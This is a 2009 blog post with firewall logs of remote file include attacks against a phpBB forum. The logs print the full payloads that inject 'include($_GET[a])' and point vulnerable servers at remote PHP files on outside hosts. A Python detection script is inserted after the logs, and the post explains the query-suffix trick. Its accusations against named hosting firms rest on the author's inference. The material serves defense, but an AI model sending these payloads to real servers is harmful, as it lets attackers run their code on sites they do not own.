Wednesday, April 15, 2009
PROOF THAT DEDIBOX.FR IS HOSTILE, and possibly laycat too.
Remember what I said about how no one notices the robber casing the joint, but everyone notices when he's committing, or has committed, the crime? Remember my go-arounds with laycat.com, kyklo.com, aceleo.com, and their more-than-willing-to-share-IP-space host, dedibox.fr?
Witness if you will, a vengeance script attack on a well defended website with two doors, and the results that are gleaned when a quick minded sentry is guarding one of those doors. The problem is, the other door, the one our attacker will go through, does not lead to satisfaction, but a grim reminder that they have stepped into... The Toilet Zone.
#: 6594 @: Tue, 14 Apr 2009 13:53:55 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 4
Why blocked: General board attack, [a] does not belong in query. Unescaped question mark in query. Remote file include attack (http). RBN.
Query: name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Through:
#: 6625 @: Tue, 14 Apr 2009 14:21:17 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 4
Why blocked: General board attack, [a] does not belong in query. Unescaped question mark in query. Remote file include attack (http). RBN.
Query: name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Then again:
#: 6627 @: Tue, 14 Apr 2009 14:26:40 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 4
Why blocked: General board attack, [a] does not belong in query. Unescaped question mark in query. Remote file include attack (http). RBN.
Query: name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Through:
#: 6633 @: Tue, 14 Apr 2009 14:27:14 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 4
Why blocked: General board attack, [a] does not belong in query. Unescaped question mark in query. Remote file include attack (http). RBN.
Query: name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Changing method to:
#: 6634 @: Tue, 14 Apr 2009 14:40:50 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 3
Why blocked: Unescaped question mark in query. Remote file include attack (http). RBN.
Query: name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org///index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Through:
#: 6644 @: Tue, 14 Apr 2009 14:44:57 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 3
Why blocked: Unescaped question mark in query. Remote file include attack (http). RBN.
Query: name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org///index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://sindepol.com.br/images/copyright%5B1%5D.txt????
Oh no, not again, just 2 this time...
#: 6663 @: Wed, 15 Apr 2009 00:20:15 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 3
Why blocked: Unescaped question mark in query. Remote file include attack (http). RBN.
Query: p=58%20%20///vwar/backup/errors.php?error=http://www.tos-belarus.org/scan/copyright.txt??
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org/forum/viewtopic.php?p=58%20%20///vwar/backup/errors.php?error=http://www.tos-belarus.org/scan/copyright.txt??
and...
#: 6664 @: Wed, 15 Apr 2009 00:20:27 -0600
Host: sd-16692.dedibox.fr
IP: 88.191.89.65
Score: 3
Why blocked: Unescaped question mark in query. Remote file include attack (http). RBN.
Query: p=58%20%20///vwar/backup/errors.php?error=http://www.tos-belarus.org/scan/copyright.txt??
Referer:
User Agent: Mozilla/5.0
Reconstructed URL: http:// zaphodb777.dyndns.org/forum/viewtopic.php?p=58%20%20///vwar/backup/errors.php?error=http://www.tos-belarus.org/scan/copyright.txt??
Now, I know that none of these attacks came from laycat.com, aceleo.com, or kyklo.com addresses themselves. But I have shown, beyond reasonable doubt, that laycat uses other IPs in the dedibox.fr domain with great freedom and regularity. Draw your own conclusions, but I say they're RIDIN' DIRTY.
Please note that attack 3, consisting of 11 shots, occurred in 7 seconds, almost 2 slams a second... ZB Block handled it with grace and did as it was supposed to.
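What those verdicts boil down to, as an added example that is not ZB Block's code or part of the original post: a Python scorer that applies the same signals the "Why blocked" lines name (a stray a parameter, a literal ? left in the query, an http:// URL fed to a parameter, PHP in a parameter value, and a hostile-source list) to the query strings quoted in the log entries above. The sample queries are copied from those entries; the benign query, the one-entry hostile network list, the signal names and the counting-style score are assumptions for the example, not ZB Block's rules or weighting. Two details the logs show but do not spell out are handled: the attacker switched from %27 to %2527 between the first and second volley, so the scorer percent-decodes until the string stops changing; and the trailing ???? on the remote URL is there so that whatever the vulnerable script appends to the include path turns into a harmless query string on the attacker's file, which include() then fetches and runs as PHP.

```python
import ipaddress
import re
from urllib.parse import unquote

# Constructed sample input: the query strings and source IP from the blocked
# requests quoted above, plus one benign forum query (assumed) for contrast.
ATTACKER_IP = "88.191.89.65"
SAMPLE_QUERIES = [
    # highlight= breaks out of a string in evaluated code and include()s $_GET[a]
    "name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/"
    "&highlight=%27.include($_GET[a]),exit.%27&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????",
    # same payload with double-encoded quotes (%2527 -> %27 -> ')
    "name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/"
    "&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sindepol.com.br/images/copyright%5B1%5D.txt????",
    # remote URL pushed straight into highlight=
    "name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15"
    "&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://sindepol.com.br/images/copyright%5B1%5D.txt????",
    # vwar errors.php RFI probe
    "p=58%20%20///vwar/backup/errors.php?error=http://www.tos-belarus.org/scan/copyright.txt??",
    # benign forum request (constructed, not from the log)
    "name=PNphpBB2&file=viewtopic&t=8&highlight=phpbb",
]

# The post reports the source as RBN-listed; this one-entry list stands in for
# a real reputation feed and is an assumption, not ZB Block's data.
HOSTILE_NETS = [ipaddress.ip_network("88.191.89.65/32")]


def fully_decode(s, rounds=3):
    """Percent-decode until the string stops changing (bounded), so a
    double-encoded %2527 is seen as the quote it really is."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def rfi_targets(query):
    """Return every remote URL handed to a parameter, i.e. the file a
    vulnerable include() would fetch and execute as PHP."""
    decoded = fully_decode(query)
    return re.findall(r"=\s*(https?://[^&\s]+)", decoded, re.IGNORECASE)


def inspect_request(query, src_ip):
    """Score one request with signals modelled on the 'Why blocked' lines
    above. The score is a plain count of signals, not ZB Block's weighting."""
    reasons = []
    decoded = fully_decode(query)
    # A bare 'a' parameter has no business in a phpBB viewtopic URL.
    if re.search(r"(?:^|[&?])a=", query):
        reasons.append("[a] does not belong in query")
    # A literal '?' inside a query string is legal, but here it is the RFI
    # suffix trick: whatever the script appends to the include path becomes
    # a query string on the remote URL and is ignored by the remote server.
    if "?" in query:
        reasons.append("unescaped question mark in query")
    if rfi_targets(query):
        reasons.append("remote file include attack (http)")
    if re.search(r"(?:include|require)(?:_once)?\s*\(|\$_(?:GET|POST|REQUEST)\b",
                 decoded, re.IGNORECASE):
        reasons.append("php code in parameter value")
    if any(ipaddress.ip_address(src_ip) in net for net in HOSTILE_NETS):
        reasons.append("source on hostile-network list")
    return len(reasons), reasons


def should_block(score, threshold=2):
    """Block on two or more independent signals so a single stray '?'
    does not lock out a real visitor."""
    return score >= threshold


if __name__ == "__main__":
    for q in SAMPLE_QUERIES:
        score, why = inspect_request(q, ATTACKER_IP)
        print(score, "BLOCK" if should_block(score) else "allow", "; ".join(why))
        for url in rfi_targets(q):
            print("   would fetch and execute:", url)
```

Run as-is, the four hostile queries score 5, 5, 3 and 3 and are blocked; the benign query from the same IP scores 1 (reputation only) and is allowed, which is the point of requiring more than one signal. The decode loop is bounded on purpose: an attacker can nest encodings as deep as they like, and an unbounded loop is a cheap way to tie up the front end.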
All in all, it looks like I caught me a weasel in the hen house. dedibox.fr is now attacksville forever, and I suggest that, whatever blocking method your site uses, you ban the domain dedibox.fr until I see some good reason that their servers need to surf your site.
